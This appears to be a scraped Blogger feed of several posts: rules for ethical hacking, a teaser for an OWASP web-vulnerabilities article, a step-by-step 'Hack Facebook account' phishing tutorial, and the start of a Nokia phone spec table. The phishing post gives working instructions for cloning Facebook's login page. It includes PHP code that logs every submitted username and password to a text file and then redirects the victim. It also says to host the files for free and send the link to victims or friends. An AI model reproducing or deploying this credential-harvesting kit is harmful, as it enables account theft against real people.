<div style="background-color: white; border: 0px; color: #454545; font-family: Verdana, sans-serif; font-size: 16px; line-height: 1.7em; padding: 0px 7em 2em 0px;">
For hacking to be deemed ethical, the hacker must obey the following rules:</div>
<ol style="background-color: white; border: 0px; color: #454545; font-family: Verdana, sans-serif; font-size: 16px; line-height: 1; margin: 0px; padding: 0px 7em 1.3em 0px;">
<li style="border: 0px; font-family: inherit; line-height: 1.5625; margin: 0px 0px 0px 4.5em; padding: 0px 0px 8px 3px;">Expressed (often written) permission to probe the network and attempt to identify potential security risks.</li>
<li style="border: 0px; font-family: inherit; line-height: 1.5625; margin: 0px 0px 0px 4.5em; padding: 0px 0px 8px 3px;">You respect the individual's or company's privacy.</li>
<li style="border: 0px; font-family: inherit; line-height: 1.5625; margin: 0px 0px 0px 4.5em; padding: 0px 0px 8px 3px;">You close out your work, not leaving anything open for you or someone else to exploit at a later time.</li>
<li style="border: 0px; font-family: inherit; line-height: 1.5625; margin: 0px 0px 0px 4.5em; padding: 0px 0px 8px 3px;">You let the software developer or hardware manufacturer know of any security vulnerabilities you locate in their software or hardware, if not already known by the company.</li>
</ol>
<div style="background-color: white; border: 0px; color: #454545; font-family: Verdana, sans-serif; font-size: 16px; line-height: 1.7em; padding: 0px 7em 2em 0px;">
The term "ethical hacker" has received criticism at times from people who say that there is no such thing as an "ethical" hacker. Hacking is hacking, no matter how you look at it and those who do the hacking are commonly referred to as computer criminals or cyber criminals. However, the work that ethical hackers do for organizations has helped improve system security and can be said to be quite effective and successful. Individuals interested in becoming an ethical hacker can work towards a certification to become a <b>Certified Ethical Hacker</b>, or <b>CEH</b>. This certification is provided by the International Council of E-Commerce Consultants (EC-Council). The exam itself costs about $500 to take and consists of 125 multiple-choice questions in version 8 of the test (version 7 consisted of 150 multiple-choice questions).</div>
<div style="background-color: white; border: 0px; color: #454545; font-family: Verdana, sans-serif; font-size: 16px; line-height: 1.7em; padding: 0px 7em 2em 0px;">
Source:<a href="http://www.computerhope.com/jargon/e/ethihack.htm">http://www.computerhope.com/jargon/e/ethihack.htm</a></div>
</div>
Unknownnoreply@blogger.com4tag:blogger.com,1999:blog-7171379281281950124.post-32636872097182690982015-09-19T02:56:00.005-07:002015-09-19T02:56:58.996-07:0010 Most Common Web Security Vulnerabilities by Toptal.com<div dir="ltr" style="text-align: left;" trbidi="on">
Topal.com is one of the top web site which writes on web application security research. Here is post written by <a class="link is-blue" href="http://www.toptal.com/resume/gergely-kalman" style="-webkit-transition: color 150ms, transform, text-shadow; border: 0px; box-sizing: border-box; color: #3863a0; display: inline; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14px; font-weight: 600; letter-spacing: 0.140000000596046px; line-height: 19px; margin: 0px; min-height: 0px; min-width: 0px; padding: 0px; text-decoration: none; text-transform: uppercase; transition: color 150ms, transform, text-shadow; vertical-align: baseline;" target="_blank">GERGELY KALMAN</a> - Security specialist about<br />
<br />
<h1 class="post_title-text" style="-webkit-box-flex: 1; background-color: #f9f9f9; border: 0px; box-sizing: border-box; color: #303030; flex-grow: 1; font-family: 'Proxima Nova', Arial, sans-serif; font-size: 35px; font-weight: 300; line-height: 40px; margin: 0px; min-height: 0px; min-width: 0px; padding: 0px 55px; position: relative; vertical-align: baseline; z-index: 1;">
"10 Most Common Web Security Vulnerabilities"</h1>
<div>
<br /></div>
<div>
<div style="background-color: white; border: 0px; box-sizing: border-box; color: #303030; font-family: 'Proxima Nova', Arial, sans-serif; font-size: 1.2em; line-height: 1.5em; margin-bottom: 1em; min-height: 0px; min-width: 0px; padding: 0px; vertical-align: baseline;">
For all too many companies, it’s not until <em style="border: 0px; box-sizing: border-box; margin: 0px; min-height: 0px; min-width: 0px; padding: 0px; vertical-align: baseline;">after</em> <a href="http://www.toptal.com/web/with-a-filter-bypass-credit-card-numbers-are-still-still-google-able" style="border: 0px; box-sizing: border-box; color: #3976cb; margin: 0px; min-height: 0px; min-width: 0px; padding: 0px; vertical-align: baseline;">a breach has occurred</a> that web security becomes a priority. During my years working as an IT Security professional, I have seen time and time again how obscure the world of IT Security is to so many of my <a href="http://www.toptal.com/web" style="border: 0px; box-sizing: border-box; color: #3976cb; margin: 0px; min-height: 0px; min-width: 0px; padding: 0px; vertical-align: baseline;">fellow programmers</a>.</div>
<div style="background-color: white; border: 0px; box-sizing: border-box; color: #303030; font-family: 'Proxima Nova', Arial, sans-serif; font-size: 1.2em; line-height: 1.5em; margin-bottom: 1em; min-height: 0px; min-width: 0px; padding: 0px; vertical-align: baseline;">
An effective approach to IT security must, by definition, be proactive and defensive. Toward that end, this post is aimed at sparking a security mindset, hopefully injecting the reader with a healthy dose of paranoia.</div>
<div style="background-color: white; border: 0px; box-sizing: border-box; color: #303030; font-family: 'Proxima Nova', Arial, sans-serif; font-size: 1.2em; line-height: 1.5em; margin-bottom: 1em; min-height: 0px; min-width: 0px; padding: 0px; vertical-align: baseline;">
In particular, this guide focuses on 10 common and significant web security pitfalls to be aware of, including recommendations on how they can be avoided. The focus is on the <a href="https://www.owasp.org/index.php/Top_10_2013-Top_10" style="border: 0px; box-sizing: border-box; color: #3976cb; margin: 0px; min-height: 0px; min-width: 0px; padding: 0px; vertical-align: baseline;" target="_blank">Top 10 Web Vulnerabilities</a> identified by the <a href="https://www.owasp.org/index.php/Main_Page" style="border: 0px; box-sizing: border-box; color: #3976cb; margin: 0px; min-height: 0px; min-width: 0px; padding: 0px; vertical-align: baseline;" target="_blank">Open Web Application Security Project (OWASP)</a>, an international, non-profit organization whose goal is to improve software security across the globe.</div>
<div style="background-color: white; border: 0px; box-sizing: border-box; color: #303030; font-family: 'Proxima Nova', Arial, sans-serif; font-size: 1.2em; line-height: 1.5em; margin-bottom: 1em; min-height: 0px; min-width: 0px; padding: 0px; vertical-align: baseline;">
<br /></div>
<h2 id="a-little-web-security-primer-before-we-start--authentication-and-authorization" style="background-color: white; border: 0px; box-sizing: border-box; color: #3863a0; font-family: 'Proxima Nova', Arial, sans-serif; line-height: 1.3em; margin: 2em 0px 1em; min-height: 0px; min-width: 0px; padding: 0px; vertical-align: baseline;">
A little web security primer before we start – authentication and authorization</h2>
<div style="background-color: white; border: 0px; box-sizing: border-box; color: #303030; font-family: 'Proxima Nova', Arial, sans-serif; font-size: 1.2em; line-height: 1.5em; margin-bottom: 1em; min-height: 0px; min-width: 0px; padding: 0px; vertical-align: baseline;">
When speaking with other programmers and IT professionals, I often encounter confusion regarding the distinction between authorization and authentication. And of course, the fact the abbreviation <em style="border: 0px; box-sizing: border-box; margin: 0px; min-height: 0px; min-width: 0px; padding: 0px; vertical-align: baseline;">auth</em> is often used for both helps aggravate this common confusion. This confusion is so common that maybe this issue should be included in this post as “Common Web Vulnerability Zero”.</div>
<div style="background-color: white; border: 0px; box-sizing: border-box; color: #303030; font-family: 'Proxima Nova', Arial, sans-serif; font-size: 1.2em; line-height: 1.5em; margin-bottom: 1em; min-height: 0px; min-width: 0px; padding: 0px; vertical-align: baseline;">
So before we proceed, let’s clearly the distinction between these two terms:</div>
<ul style="background-color: white; border: 0px; box-sizing: border-box; color: #303030; font-family: 'Proxima Nova', Arial, sans-serif; font-size: 1.2em; line-height: 20px; list-style: none; margin: 0px 0px 1em; min-height: 0px; min-width: 0px; padding: 0px; vertical-align: baseline;">
<li style="border: 0px; box-sizing: border-box; line-height: 1.5em; list-style-type: disc; margin: 0px 0px 0.75em 30px; min-height: 0px; min-width: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; font-weight: 600; margin: 0px; min-height: 0px; min-width: 0px; padding: 0px; vertical-align: baseline;">Authentication:</span> Verifying that a person is (or at least appears to be) a specific user, since he/she has correctly provided their security credentials (password, answers to security questions, fingerprint scan, etc.).</li>
<li style="border: 0px; box-sizing: border-box; line-height: 1.5em; list-style-type: disc; margin: 0px 0px 0.75em 30px; min-height: 0px; min-width: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; font-weight: 600; margin: 0px; min-height: 0px; min-width: 0px; padding: 0px; vertical-align: baseline;">Authorization:</span> Confirming that a particular user has access to a specific resource or is granted permission to perform a particular action.</li>
</ul>
<div style="background-color: white; border: 0px; box-sizing: border-box; color: #303030; font-family: 'Proxima Nova', Arial, sans-serif; font-size: 1.2em; line-height: 1.5em; margin-bottom: 1em; min-height: 0px; min-width: 0px; padding: 0px; vertical-align: baseline;">
Stated another way, <em style="border: 0px; box-sizing: border-box; margin: 0px; min-height: 0px; min-width: 0px; padding: 0px; vertical-align: baseline;">authentication</em> is knowing who an entity is, while <em style="border: 0px; box-sizing: border-box; margin: 0px; min-height: 0px; min-width: 0px; padding: 0px; vertical-align: baseline;">authorization</em> is knowing what a given entity can do.</div>
<div style="background-color: white; border: 0px; box-sizing: border-box; color: #303030; font-family: 'Proxima Nova', Arial, sans-serif; font-size: 1.2em; line-height: 1.5em; margin-bottom: 1em; min-height: 0px; min-width: 0px; padding: 0px; vertical-align: baseline;">
Read More:<a href="http://www.toptal.com/security/10-most-common-web-security-vulnerabilities">http://www.toptal.com/security/10-most-common-web-security-vulnerabilities</a></div>
</div>
</div>
Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-7171379281281950124.post-24763898962943672352014-06-30T10:05:00.001-07:002014-06-30T10:14:23.924-07:00Hack Facebook account through Phising<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: left;">
</div>
<h2 style="text-align: left;">
<u>What is phishing?</u></h2>
<div style="text-align: left;">
<span class="data-post"></span></div>
<div>
<i><b><span style="font-family: Georgia,'Times New Roman',serif;"><br /></span></b></i></div>
<div>
<i><b><span style="background-color: white; font-family: sans-serif; line-height: 19px;">Phishing</span><span style="background-color: white; font-family: sans-serif; line-height: 19px;"> is attempting to acquire information (and sometimes, indirectly, money) such as usernames, </span>passwords<span style="background-color: white; font-family: sans-serif; line-height: 19px;">, and credit card details by masquerading as a trustworthy entity in an </span>electronic communication<span style="background-color: white; font-family: sans-serif; line-height: 19px;">.
Communications purporting to be from popular social web sites, auction
sites, online payment processors or IT administrators are commonly used
to lure the unsuspecting public. Phishing is typically carried out by </span>e-mail<span style="background-color: white; font-family: sans-serif; line-height: 19px;"> </span>spoofing<span style="background-color: white; font-family: sans-serif; line-height: 19px;"> or </span>instant messaging<span style="background-color: white; font-family: sans-serif; line-height: 19px;">,</span><span style="background-color: white; font-family: sans-serif; line-height: 19px;">and it often directs users to enter details at a fake website whose </span>look and feel<span style="background-color: white; font-family: sans-serif; line-height: 19px;"> are almost identical to the legitimate one. Phishing is an example of </span>social engineering<span style="background-color: white; font-family: sans-serif; line-height: 19px;"> techniques used to deceive users,</span><span style="background-color: white; font-family: sans-serif; line-height: 19px;"> and exploits the poor usability of current web security technologies.</span><span style="background-color: white; font-family: sans-serif; line-height: 19px;"> Attempts to deal with the growing number of reported phishing incidents include</span>legislation<span style="background-color: white; font-family: sans-serif; line-height: 19px;">, user training, public awareness, and technical security measures.</span></b></i></div>
<br />
<br />
<h2 style="text-align: left;">
<u><b><span style="font-weight: normal;">Facebook Phishing:</span></b></u></h2>
<div style="text-align: left;">
In Facebook Phishing we create our own page which is like Facebook page for that purpose we copy the source code of <b>Facebook.com</b> and make some amendment in it when the victim try to sin in he redirected on the webpage of our choice and it's email and password is sent to the hosting site and in this way we get it's account!<br />
<br />
Facebook Hacking through Phishing:<br />
Just Follow the following steps to make your own Facebook Phishing Page.</div>
<div style="text-align: -webkit-auto;">
<i><b><span style="font-family: sans-serif;"><span style="line-height: 19px;"><span style="color: #cc0000;">1.</span>Go to the </span><span style="color: #cc0000;"><span style="line-height: 19px;">Facebook page</span></span><span style="line-height: 19px;"> ,and then right click on the page, u will see the option </span><span style="color: #cc0000; line-height: 19px;">view source page</span><span style="line-height: 19px;">,click on that.</span></span></b></i><br />
<i><b><span style="font-family: sans-serif;"><span style="line-height: 19px;"><br /></span></span></b></i>
<i><b><span style="font-family: sans-serif;"><span style="line-height: 19px;"><br /></span></span></b></i>
<i><b><span style="font-family: sans-serif;"><span style="line-height: 19px;"><br /></span></span></b></i>
<br />
<div class="separator" style="clear: both; text-align: center;">
<i><b><img alt="Facebook Hacking" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhthNEouznk17_ijLcSFPoPHrKiTPnbUz5GselqeCSRaWN0RLMYUt57tXNJ6EJ4wU6QSAwKVIwnVgm4lOzK7zEVSecPW_lDxYeUalluaswNwEH7gp0cVPaEdAOMWLyzVBeCeURXRLdXu1Y/s640/Untitled.png" height="223" title="Facebook phishing" width="400" /></b></i></div>
<i><b><span style="font-family: sans-serif;"><span style="line-height: 19px;"> </span></span></b></i></div>
<div style="text-align: -webkit-auto;">
<i><b><span style="font-family: sans-serif;"><span style="line-height: 19px;"><span style="color: #cc0000;">2.</span>now a new tab will open which contain a source code,Select all the stuff and paste it in a notepad.</span></span></b></i></div>
<div style="text-align: -webkit-auto;">
<i><b><span style="font-family: sans-serif;"><span style="line-height: 19px;"><span style="color: #cc0000;">3.</span>Now open the notepad and press <span style="color: #cc0000;">CTRL+F</span>,and type<span style="color: #cc0000;"> ACTION.</span></span></span></b></i><br />
<i><b><span style="font-family: sans-serif;"><span style="line-height: 19px;"><span style="color: #cc0000;"><br /></span></span></span></b></i>
<br />
<div class="separator" style="clear: both; text-align: center;">
<i><b><img alt="facebook phishing script" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSO3joGVxj6xBlR_NVtZq4rJ43_KZLcpHYhYnLlOndAKT0pt6Zj8QZyb6LjtCm8ah8BulR4bn8UqyhEMUlfELVeVEwEbPAUcOjEelF9OmnBcxaqDIJ2_a4sDQrBXSi_YdZzKyRYk88ggo/s640/Untitled.png" height="223" title="hacking facebook account" width="400" /></b></i></div>
<i><b><span style="font-family: sans-serif;"><span style="line-height: 19px;"><span style="color: #cc0000;"> </span></span></span></b></i><br />
<i><b><span style="font-family: sans-serif;"><span style="line-height: 19px;"><span style="color: #cc0000;"><br /></span></span></span></b></i>
<i><b><span style="font-family: sans-serif;"><span style="line-height: 19px;"><span style="color: #cc0000;"> </span></span></span></b></i></div>
<div style="text-align: -webkit-auto;">
<i><b><span style="font-family: sans-serif;"><span style="line-height: 19px;"><span style="color: #cc0000;">4.</span>You will have to find a text which looks like ..</span></span></b></i></div>
<div style="text-align: -webkit-auto;">
<h4 style="text-align: left;">
<i><b><span style="font-family: sans-serif;"><span style="line-height: 19px;"> </span></span><span class="webkit-html-attribute-name" style="color: #cc0000; font-family: monospace; white-space: pre-wrap;"><u>action</u></span><span style="color: #881280; font-family: monospace; white-space: pre-wrap;">=<u>"</u></span><span style="color: #990000;"><u><span class="webkit-html-attribute-value" style="font-family: monospace; white-space: pre-wrap;">https://www.facebook.com/login.php?</span><span class="webkit-html-attribute-value" style="font-family: monospace; white-space: pre-wrap;">login_attempt=1</span></u></span><span style="color: #881280; font-family: monospace; white-space: pre-wrap;">"</span></b></i></h4>
</div>
<div style="text-align: -webkit-auto;">
<i><b><span style="font-family: sans-serif;"><span style="line-height: 19px;"><span style="color: #cc0000;">5.</span>delete all the text written in red colour and instead of it write post.php.then it will look like...</span></span></b></i><br />
<i><b><span style="font-family: sans-serif;"><span style="line-height: 19px;"><br /></span></span></b></i></div>
<div style="text-align: -webkit-auto;">
<i><b><span style="font-family: sans-serif;"><span style="line-height: 19px;"> <span style="color: #cc0000;">action=</span>"<span style="color: #990000;"><u>post.php</u></span>"</span></span></b></i></div>
<div style="text-align: -webkit-auto;">
<i><b><span style="font-family: sans-serif;"><span style="line-height: 19px;"><br /></span></span></b></i></div>
<div style="text-align: -webkit-auto;">
<i><b><span style="font-family: sans-serif;"><span style="line-height: 19px;"><span style="color: #cc0000;">6.</span>Now save it on your desktop with the name<span style="color: #cc0000;"> index.htm</span>,not index.html,remember.</span></span></b></i></div>
<div style="text-align: -webkit-auto;">
<i><b><span style="font-family: sans-serif;"><span style="line-height: 19px;"><br /></span></span></b></i></div>
<div style="text-align: -webkit-auto;">
<i><b><span style="font-family: sans-serif;"><span style="line-height: 19px;"><span style="color: #cc0000;">7.</span>Now your phishing page is ready.it will look like a pic given below .</span></span></b></i><br />
<i><b><span style="font-family: sans-serif;"><span style="line-height: 19px;"><br /></span></span></b></i>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td><i><b><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiW-zNmqOv7QKwC_5WZjav4P2hfkzo0KcxViNV6jBHpsRAlmyka6ZwPFao77cOrMUhZcMyVfXEZ2UzGzupMWH4B5RAKPXnqXIqUK_-6t8rVg5oJU47CvP9TBjN1dDMn7DSbWEXR7x-UVkw/s1600/post-99705-1213608003.png" style="margin-left: auto; margin-right: auto;"><img alt="hacking script" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiW-zNmqOv7QKwC_5WZjav4P2hfkzo0KcxViNV6jBHpsRAlmyka6ZwPFao77cOrMUhZcMyVfXEZ2UzGzupMWH4B5RAKPXnqXIqUK_-6t8rVg5oJU47CvP9TBjN1dDMn7DSbWEXR7x-UVkw/s200/post-99705-1213608003.png" height="200" title="index.html" width="200" /></a></b></i></td></tr>
<tr><td class="tr-caption" style="font-size: 13px;"><i><b><u><span style="color: #cc0000;">index</span></u></b></i></td></tr>
</tbody></table>
<i><b><span style="font-family: sans-serif;"><span style="line-height: 19px;"><br /></span></span></b></i>
<i><b><span style="font-family: sans-serif;"><span style="line-height: 19px;"> </span></span></b></i><br />
<i><b><span style="font-family: sans-serif;"><span style="line-height: 19px;"><span style="color: #cc0000;">8.</span>Open a new notepad and save the given data with the name<span style="color: #cc0000;"><u> post.php</u></span>.</span></span></b></i><br />
<i><b><span style="font-family: sans-serif;"><span style="line-height: 19px;"><br /></span></span></b></i>
<i><b><span style="font-family: sans-serif; line-height: 19px;"><?php</span></b></i><br />
<i><b><span style="font-family: sans-serif; line-height: 19px;">header ('Location:http://www.facebook.com/');</span></b></i><br />
<i><b><span style="font-family: sans-serif; line-height: 19px;">$handle = fopen("usernames.txt", "a");</span></b></i><br />
<i><b><span style="font-family: sans-serif; line-height: 19px;">foreach($_POST as $variable => $value) {</span></b></i><br />
<i><b><span style="font-family: sans-serif; line-height: 19px;"> fwrite($handle, $variable);</span></b></i><br />
<i><b><span style="font-family: sans-serif; line-height: 19px;"> fwrite($handle, "=");</span></b></i><br />
<i><b><span style="font-family: sans-serif; line-height: 19px;"> fwrite($handle, $value);</span></b></i><br />
<i><b><span style="font-family: sans-serif; line-height: 19px;"> fwrite($handle, "\r\n");</span></b></i><br />
<i><b><span style="font-family: sans-serif; line-height: 19px;">}</span></b></i><br />
<i><b><span style="font-family: sans-serif; line-height: 19px;">fwrite($handle, "\r\n");</span></b></i><br />
<i><b><span style="font-family: sans-serif; line-height: 19px;">fclose($handle);</span></b></i><br />
<i><b><span style="font-family: sans-serif; line-height: 19px;">exit;</span></b></i><br />
<i><b><span style="font-family: sans-serif; line-height: 19px;">?> </span></b></i><br />
<i><b><span style="font-family: sans-serif; line-height: 19px;"><br /></span></b></i>
<i><b><span style="font-family: sans-serif; line-height: 19px;"><span style="color: #cc0000;">9.</span>You have two files now one is <span style="color: #cc0000;">index.htm </span>and another is<span style="color: #cc0000;"> post.php</span>,remember file extension is important.</span></b></i><br />
<i><b><span style="font-family: sans-serif; line-height: 19px;"><br /></span></b></i>
<i><b><span style="font-family: sans-serif; line-height: 19px;"><span style="color: #cc0000;">10.</span>Now u have to upload it in a web hosting site ,i prefer u to use <a href="http://www.000webhost.com/">www.000webhost.com</a>.</span></b></i><br />
<i><b><span style="font-family: sans-serif; line-height: 19px;"><br /></span></b></i>
<i><b><span style="font-family: sans-serif; line-height: 19px;"><span style="color: #cc0000;">11.</span>I prefer u to use <span style="color: #990000;">000webhost </span>because it will be easy to use.</span></b></i><br />
<i><b><span style="font-family: sans-serif; line-height: 19px;"> </span></b></i><br />
<div class="separator" style="clear: both; text-align: center;">
<i><b><img alt="hosting website" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCEYGMx5CKSOWK46M2kOZFwE8TSbGwAQF9CWQuTL82uBukjOqDaRFistUIWpLhFIYYvJ5V7vppNNRczQqp-gJWmtipBrM3XyqvgRonGFsAB881OL_naNl9_UisRctBXpQD-2g6uU4ldkw/s640/Untitled1.png" height="224" title="000webhost.com" width="400" /></b></i></div>
<i><b><span style="font-family: sans-serif; line-height: 19px;"> </span></b></i><br />
<i><b><span style="font-family: sans-serif; line-height: 19px;"><br /></span></b></i>
<i><b><span style="font-family: sans-serif; line-height: 19px;"><span style="color: #cc0000;">12.</span>You have to make a account in that ,after that it looks like a picture given below.</span></b></i><br />
<i><b><span style="font-family: sans-serif; line-height: 19px;"><br /></span></b></i>
<i><b><span style="font-family: sans-serif; line-height: 19px;"><br /></span></b></i>
<br />
<div class="separator" style="clear: both; text-align: center;">
<i><b><img alt="facebook script hosting website" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4MfDqk_GJWoLGRasC_JuFDtx7lWq3-mkJvpdBdRE0hciAIXJNjKKt-wHXERTil3ntZ5Jx41u5M0eUxpg7O-O57LnNEQ2nV8G9h9Kurq6sRmrrm1QY-tV5wMMLFYUNP2mM0wmmFsiGZ7A/s640/Untitled.png" height="224" title="hosting website" width="400" /></b></i></div>
<i><b><span style="font-family: sans-serif; line-height: 19px;"> </span></b></i><br />
<i><b><span style="font-family: sans-serif; line-height: 19px;"><span style="color: #cc0000;">13.</span>Now go <span style="color: #990000;">control panne</span>l,then on <span style="color: #990000;">file manager</span>.</span></b></i><br />
<i><b><span style="font-family: sans-serif; line-height: 19px;"><br /></span></b></i>
<i><b><span style="font-family: sans-serif; line-height: 19px;"><span style="color: #cc0000;">14.</span>After that a new window will pop up.Now go to<span style="color: #990000;"> public_html.</span></span></b></i><br />
<i><b><span style="font-family: sans-serif; line-height: 19px;"><span style="color: #990000;"><br /></span></span></b></i>
<br />
<div class="separator" style="clear: both; text-align: center;">
<i><b><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1MmCz4HMAW0BGouC1wUq2NwXvR4zbDVFRYXWSMLpH-XFx2uv4XOiZ7Z_MDCgQWQGtZpK3IfwRn6NV0ZlWAMy4bmDpqPsfbV1_6UVVRRq2KQmVgrpZxH4urqTC4Bcg2HIsBYHA4Y8aPuU/s640/Untitled+2.png" height="224" width="400" /></b></i></div>
<i><b><span style="font-family: sans-serif; line-height: 19px;"><span style="color: #990000;"> </span></span></b></i><br />
<i><b><span style="font-family: sans-serif; line-height: 19px;"><span style="color: #990000;"> </span></span></b></i><br />
<i><b><span style="font-family: sans-serif; line-height: 19px;"><br /></span></b></i>
<i><b><span style="font-family: sans-serif; line-height: 19px;"><span style="color: #cc0000;">15.</span>Delete the file named<span style="color: #cc0000;"> default.php</span>,after that upload two files<span style="color: #990000;"> index.htm</span> and <span style="color: #990000;">post.php </span>one by one .</span></b></i><br />
<i><b><span style="font-family: sans-serif; line-height: 19px;"><br /></span></b></i>
<i><b><span style="font-family: sans-serif; line-height: 19px;"><br /></span></b></i>
<br />
<div class="separator" style="clear: both; text-align: center;">
<i><b><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh41LMOJj1Sa6RvayQTXmz7mbpXPIKeeaxklvKAnfEb2bfXnBJq5buEajz5voVTjUqvT_lF4x8LyC8vn6AowckOeNAnqziklLjL6M9A946NFfaG0qmBCQHMTmt3aZPEdKGFoplT4uFg4NY/s640/Untitled+3.png" height="224" width="400" /></b></i></div>
<i><b><span style="font-family: sans-serif; line-height: 19px;"> </span></b></i><br />
<i><b><span style="font-family: sans-serif; line-height: 19px;"><span style="color: #cc0000;">16.</span>Now the last step click on view of index.htm it will look same as facebook page.</span></b></i><br />
<i><b><span style="font-family: sans-serif; line-height: 19px;"><br /></span></b></i>
<i><b><span style="font-family: sans-serif; line-height: 19px;"><br /></span></b></i>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td><i><b><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhM3M5hg56ijH9c6jxlxL2wdzjrCIcGAnd7rJGEvf945SNQ5aWsHRaqbouGpxgePY39vQDSoHwUQxAdeFBYva2cktK2Jfh1FVBdyTi2n93MIS339551Xx0U5xW5SIEETitLAfFyuvQ6nPc/s1600/Untitled+4.png" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhM3M5hg56ijH9c6jxlxL2wdzjrCIcGAnd7rJGEvf945SNQ5aWsHRaqbouGpxgePY39vQDSoHwUQxAdeFBYva2cktK2Jfh1FVBdyTi2n93MIS339551Xx0U5xW5SIEETitLAfFyuvQ6nPc/s640/Untitled+4.png" height="223" width="400" /></a></b></i></td></tr>
<tr><td class="tr-caption" style="font-size: 13px;"><i><b><span style="color: #cc0000;"><u>this is your Facebook phishing page</u></span></b></i></td></tr>
</tbody></table>
<i><b><span style="font-family: sans-serif; line-height: 19px;"> </span></b></i><br />
<i><b><span style="font-family: sans-serif; line-height: 19px;"><br /></span></b></i>
<i><b><span style="font-family: sans-serif; line-height: 19px;"><span style="color: #cc0000;">17.</span>Copy the <span style="color: #990000;">url</span> of
that page and send this link to your victim,when your victim try to
login in to it with the username and password .the page redirectly
connect to facebook. and you will be now able to see his password.</span></b></i><br />
<i><b><span style="font-family: sans-serif; line-height: 19px;"><br /></span></b></i>
<i><b><span style="font-family: sans-serif; line-height: 19px;"><span style="color: #cc0000;">18.</span>Open your<span style="color: #990000;"> 000webhost account</span> and go to<span style="color: #990000;"> file manager</span> then<span style="color: #990000;"> public_html,</span>here you find a new file named<span style="color: #990000;"><u> username.txt.</u></span></span></b></i><br />
<i><b><span style="font-family: sans-serif;"><span style="line-height: 19px;"> </span></span></b></i><br />
<i><b><span style="font-family: sans-serif;"><span style="line-height: 19px;"><br /></span></span></b></i>
<br />
<div class="separator" style="clear: both; text-align: center;">
<i><b><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjb9uRHKWxDlPneO8zkraGkDeoMXKGXWKGz1TNnad8mRQX_ge3Lj8mt1VCsp4kMKINdZysY5xVXJxTys3SgilgAc21lrK1zCzEwlXj8-kjsCH348XItwaz5qGaP1BSNqscLAlck-8-oGdw/s640/Untitled+5.png" height="224" width="400" /></b></i></div>
<i><b><span style="font-family: sans-serif;"><span style="line-height: 19px;"> </span></span></b></i><br />
<i><b><span style="font-family: sans-serif; line-height: 19px;"><span style="color: #990000;"><u><br /></u></span></span></b></i>
<i><b><span style="font-family: sans-serif; line-height: 19px;"><span style="color: #cc0000;">19.</span>Click on view now u will have your friend's<span style="color: #990000;"><u> password</u></span> and<span style="color: #990000;"><u> email id.</u></span></span></b></i><br />
<i><b><span style="font-family: sans-serif; line-height: 19px;"><span style="color: #990000;"><u><br /></u></span></span></b></i>
<br />
<div class="separator" style="clear: both; text-align: center;">
<i><b><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhixvSuJAsK_jAXeZi_AgLAimBNzix5kzFn68P8FEEUjb-zZWFo4jr_PMZnlEz7kaFD6o97wi09mih6XTJ32gnZetzf3yYLeI-pQUlekU9vgkbZE1Gx5UnRLE_u5HsjwsM1nhdnU9AzXBk/s640/Untitled+6.png" height="224" width="400" /></b></i></div>
<i><b><span style="color: #990000; font-family: sans-serif;"><span style="line-height: 19px;"> </span></span></b></i><br />
<i><b><span style="font-family: sans-serif; line-height: 19px;"><br /></span></b></i>
<i><b><span style="font-family: sans-serif;"><span style="line-height: 19px;"><span style="color: #cc0000;">20.</span>This is a simple trick to hack any Facebook password account by phishing page.</span></span></b></i><br />
<i><b><span style="font-family: sans-serif;"><span style="line-height: 19px;"><br /></span></span></b></i>
<i><b><span style="font-family: sans-serif;"><span style="line-height: 19px;"><span style="color: #cc0000;"><br />I hope you will understand this!<br /><span style="color: black;"><br />You can also create phishing page of Yahoo.com, Twitter.com, Gmail.com, Orkut.com, Blogger.com, Hotmail.com etc. and can easily hack accounts!</span></span></span></span></b></i><i><b><span style="font-family: sans-serif;"><span style="line-height: 19px;"></span></span></b></i></div>
<div style="text-align: left;">
<br /></div>
</div>
Unknownnoreply@blogger.com5tag:blogger.com,1999:blog-7171379281281950124.post-4991803798244876782014-06-27T01:37:00.002-07:002014-06-27T01:40:36.895-07:00Nokia Asha 300 Full specifications and Price<div dir="ltr" style="text-align: left;" trbidi="on">
<table border="0" cellpadding="0" cellspacing="0" style="height: 750px; width: 353px;"><tbody>
<tr class="RowBG1"><td valign="top"><br /></td><td colspan="3"><b>Nokia Asha 300 - Fun & Fast.</b><br />
Get the speed that you need with <b>Nokia Asha 300</b> when you want to go online, Make the home screen yours on <b>Nokia Asha 300</b> with everything you want just a touch away, The <b>Nokia Asha 300</b> makes staying in touch really easy. Update your <span class="IL_AD" id="IL_AD3">Facebook</span> status or send a tweet, Use the 5 MP camera of <b>Nokia Asha 300</b> to snap all the nice things and the surprising things you find in your daily life. </td> </tr>
<tr class="RowBG2"> <td valign="top"><br /></td><td class="hdngArial" height="30"> Dimension</td> <td valign="top"><br /></td><td colspan="2">112.8 x 49.5 x 12.7 mm, 59 cc </td> </tr>
<tr><td valign="top"><br /></td><td valign="top"><br /></td><td valign="top"><br /></td><td valign="top"><br /></td><td valign="top"><br /></td></tr>
